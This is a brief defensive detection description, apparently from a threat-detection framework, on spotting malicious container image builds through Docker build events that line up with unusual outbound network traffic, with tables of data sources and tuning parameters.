Detection of container image build activity directly on the host using Docker or Kubernetes APIs. Defenders may observe Docker build requests, anomalous Dockerfile instructions (such as downloading code from unknown IPs), or creation of new images followed by immediate deployment. This behavior chain typically consists of an unexpected image creation event correlated with outbound network communication to non-standard or untrusted destinations.
| Data Component | Name | Channel |
|---|---|---|
| Image Creation (DC0015) | docker:daemon | docker build or POST /build API request |
| Network Connection Creation (DC0082) | NSM:Flow | outbound connections from host during or immediately after image build |
| Field | Description |
|---|---|
| RegistryAllowList | Defines trusted registries for image pulls/builds. Builds referencing unapproved registries may indicate adversary behavior. |
| NewImageThreshold | Threshold for number of new custom images created in a given time window. Exceeding this threshold may indicate malicious builds. |
| TimeWindow | Defines correlation window (e.g., 5m) between suspicious build activity and subsequent network traffic anomalies. |